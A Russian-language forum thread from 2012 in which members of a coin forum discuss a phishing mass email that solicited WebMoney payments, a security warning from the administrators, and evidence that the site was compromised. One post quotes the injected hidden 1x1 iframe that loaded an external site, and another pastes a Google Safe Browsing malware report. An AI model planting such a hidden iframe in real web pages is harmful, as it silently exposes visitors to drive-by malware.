ХАК 23-06-2012

[Gr@nD 244]

мне не приходило ...Герман тут был чуть ранее ,Михаил уже на форуме

[ndg]

Письмо пришло... Хотел у Миши номер карты просить, а то веб-мани для меня не удобный вид оплаты

[нахалёнок]

пошла МОЯ рассылка. встречайте

[KVOVA]

В 9.26 тож получил,если б не задержала по дому жена ,побег бы в банк.

[Gr@nD]

где встречать?

[СтарецЪ]

Миш, пока пусто...

[нахалёнок]

13178 получателей, 50 писем за раз

прошлая массовая рассылка была такая

11 12 2011 13:38:48 7611 members 382 минут

[Nikitin67]

Письмо получил.Удивился ,что так собирают на благое дело.Вышел на форум понял мошенничество.

[tovarisch]

что-то нет писем ни от врагов, ни от друзей

[sandco]

Писем нет и небыло. Форум вчера не пускал на яблочном планшете - грузил пустую страницу. Сегодня всё как всегда.

[Fusspfleger]

Обнаружил у себя Hack Tool:Win32 .Описание вируса http://www.microsoft...id%3D2147649714

[ndg]

Письмо с предупреждением дошло...

[Юрий Анатольевич]

Процитирую на всякий случай и здесь:

В Опере под линукс высвечивается предупреждение о том, что сайт содержит вирус.

И еще внизу код сайта содержит вот это:

<<noindex><nofollow><iframe src="http://3d-wares.com/" width="1" height="1" style="border:0px;"></iframe></nofollow></noindex> 

Если админы форума это не размещали, то, как веб-разработчик, ответственно заявляю, что форум взломали и с вероятностью 99% слили зашифрованные пароли. Если зашифрованные пароли слили, то все слабые пароли уже расшифровали (те, что меньше 9 символов, а также те, что содержат простые слова, либо цифры.

PS: Если это не вирус, но вирусы здесь точно были - значит у хакера был доступ к файлам. Если у хакера был доступ к файлам форума, значит у него был доступ к базе зашифрованных паролей. Обычно в таком случае принудительно меняют пароли на случайно сгенерированные 10-символьные и рассылают их по почте. При этом просят еще раз сменить пароль, но добавляют проверку на то, чтобы пользователи не могли сменить пароль на старый.

Также если появятся случаи увода аккаунтов, то лучше бы объявить временный мораторий на аукционы.

[СтарецЪ]

Получил настоящее письмо от администрации ЦФН!

[alekslod]

Впервые за долгое время увидел, что к нам заглянул Форумный Дух

[BOTIZ]

Получил настоящее письмо от администрации ЦФН!

Я тоже получил.

[нахалёнок]

кстати что-то совсем мало кто свой телефон ему в личку скидывал типа для верификации

[нахалёнок]

Сегодня, 11:58:30 4300 members 86 минут

[Беня]

Я ничего не получал. Ни от врагов, ни от начальства

[kolbaser]

эх Миша-Миша, сколько раз мы говорили с тобой, что деньги портят людей

[sandco]

Писем нет

[karupoiss]

Есть. Оба.

[Sepp]

А меня firefox уведомил, что сайт устанавливает ПО без согласия пользователя и т.п.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ru&site=http://coins.su/forum/

[Esromeron]

Получил обап письма. Разумеется, понял, что письмо с вебманями - подстава. Странно, что для отправки подставы smtp сервер использовался тот же.

[Vestik]

Проиндексировано Googl'om:

Безопасный просмотр

Страница диагностики для coins.su/forum

Занесен ли сайт coins.su/forum в список подозрительных?

Сайт занесен в список подозрительных. Посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта за последние 90 дней была замечена подозрительная активность (число таких случаев: 2).

Что произошло во время последнего посещения этого сайта компанией Google?

На 12 из 12 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя. Последнее посещение этого сайта системой Google произошло 2012-06-24; последний раз подозрительный контент был обнаружен на этом сайте 2012-06-24.

Сетей, в которых размещался этот сайт: 1 (в том числе AS24940 (HETZNER)).

Был ли этот сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт coins.su/forum не использовался в качестве промежуточного звена для заражения других сайтов.

Размещалось ли на этом сайте вредоносное ПО?

Нет. За последние 90 дней на этом сайте не размещалось вредоносное ПО.

Как это произошло?

В некоторых случаях третьи лица могут добавлять вредоносный код на сайты, созданные со вполне законными целями. Предупреждение могло быть показано нами именно по этой причине.

Дальнейшие действия:

Вернуться на предыдущую страницу.

Если вы владелец этого веб-сайта, можете запросить анализ вашего сайта с помощью Инструментов Google для веб-мастеров. Дополнительные сведения о процессе анализа см. в Справочном центре Инструментов Google для веб-мастеров.

Обновлено 2 ч. назад

Мой заход с Firefox'a , но дело уже не в броузерах - если Гугл проиндексировал, проблемы будут у всех, у кого настройки безопасности по умолчанию.